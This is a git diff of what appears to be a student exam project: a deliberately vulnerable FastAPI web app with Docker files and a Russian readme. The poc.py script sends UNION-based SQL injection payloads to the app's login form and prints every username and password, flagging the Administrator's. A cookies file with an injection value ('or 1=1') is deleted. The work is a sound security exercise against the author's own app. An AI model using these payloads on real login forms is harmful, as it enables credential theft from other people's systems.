personify

.gitignore

@@ -1,4 +1,3 @@
-build
 .vscode
 **__pycache__
 data

build

@@ -0,0 +1 @@
+docker build -t kulesh_web-app:v0.0.1a .

compose.yaml

@@ -1,7 +1,7 @@
 services:
-  vunerable-web-app:
+  vunerable-web-app1:
     image: kulesh_web-app:v0.0.1a  
     ports:
-      - "80:8000"
+      - "21252:8000"
     volumes:
       - ./data/:/app/data

cookies.txt

@@ -1,6 +0,0 @@
-# Netscape HTTP Cookie File
-# https://curl.se/docs/http-cookies.html
-# This file was generated by libcurl! Edit at your own risk.
-
-localhost	FALSE	/	FALSE	0	password	a
-localhost	FALSE	/	FALSE	0	login	"' or 1=1-- "

poc.py

@@ -9,24 +9,31 @@ args = parser.parse_args()
 
 BASE_URL = args.base_url
 
-login_payload = "' UNION SELECT login FROM users--"
+login_payload = "' UNION SELECT login FROM (Select * from users ORDER BY id)--"
 form_data = {"login": login_payload, "password": "' OR 1=1--"}
 response_logins = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
-
-password_payload = "' UNION SELECT password FROM users--"
-form_data = {"login": password_payload, "password": "' OR 1=1--"}
-response_passwords = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
-
 logins_raw = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_logins.text).group(1)
-passwords_raw = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_passwords.text).group(1)
-
 logins= logins_raw.split("',), ('")
-passwords = passwords_raw.split("',), ('")
+
+
+passwords=[]
+for login in logins:
+    password_payload = f"' UNION SELECT password FROM (Select * from users WHERE login='{login}')--"
+    form_data = {"login": password_payload, "password": "' OR 1=1--"}
+    response_password = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
+    password = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_password.text).group(1)
+    passwords.append(password)
 
 
 if logins and passwords:
     for i, (login, password) in enumerate(zip(logins, passwords)):
-        print(f"  {i+1}. Логин: {login:<20} Пароль: {password}")
+        if login == "Administrator":
+            print(f"{'*' * 60}")
+            print(f"  {i+1}. Логин: {login:<20} Пароль: {password}  <-- !!! ВАЖНО !!!")
+            print(f"{'*' * 60}")
+        else:
+            print(f"  {i+1}. Логин: {login:<20} Пароль: {password}")
+            
 else:
     print("Не удалось извлечь данные.")
 

poc_recs.txt

@@ -1 +0,0 @@
-requests

readme.md

@@ -0,0 +1,54 @@
+!! Скриншоты без подписей, пожалуйста смотрите документ в yonote
+ 
+К сожалениюя я не любитель PHP, так что всё будет на питоне (Fastapi)
+
+# PC-Seq-Exam-WebApp
+
+## Сборка 
+
+```sh
+docker build -t kulesh_web-app:v0.0.1a .
+```
+
+## Запуск 
+```sh
+docker compose up -d
+```
+## Регистрация через curl
+
+
+```bash
+curl -X POST http://10.254.252.100:801/register -d "login=Administrator&password=protected_by_sheer_will" -L
+curl -X POST http://10.254.252.100:801/register -d "login=Kulesh_AB&password=bibaIboba2aboba" -L
+```
+## SQLi
+в бреду намаслал Proof Of Concept
+он мало что проверяет, но как я понял рабоатет, быть может за исклбчением когда 
+пользователь очень любит скобочки кавычки и пробелы)
+
+для запуска ставим requests,
+```pip install requests```
+ в помошь)
+```sh
+python ./poc.py --base-url http://aboba.eu
+```
+допустм что 2 пользователя зарегались с посмошью команд выше
+
+```
+./poc.py
+************************************************************
+  1. Логин: Administrator        Пароль: protected_by_sheer_will  <-- !!! ВАЖНО !!!
+************************************************************
+  2. Логин: Kulesh_AB            Пароль: bibaIboba2aboba
+```
+
+
+Выполнил Кулеш А.Б.
+Б9123-09.03.04
+
+---
+Он постоянно что-то ест, он постоянно что-то пьёт
+
+Он быстро набирает вес, клянётся, что в спортзал пойдёт
+
+Но продолжает что-то есть и продолжает что-то пить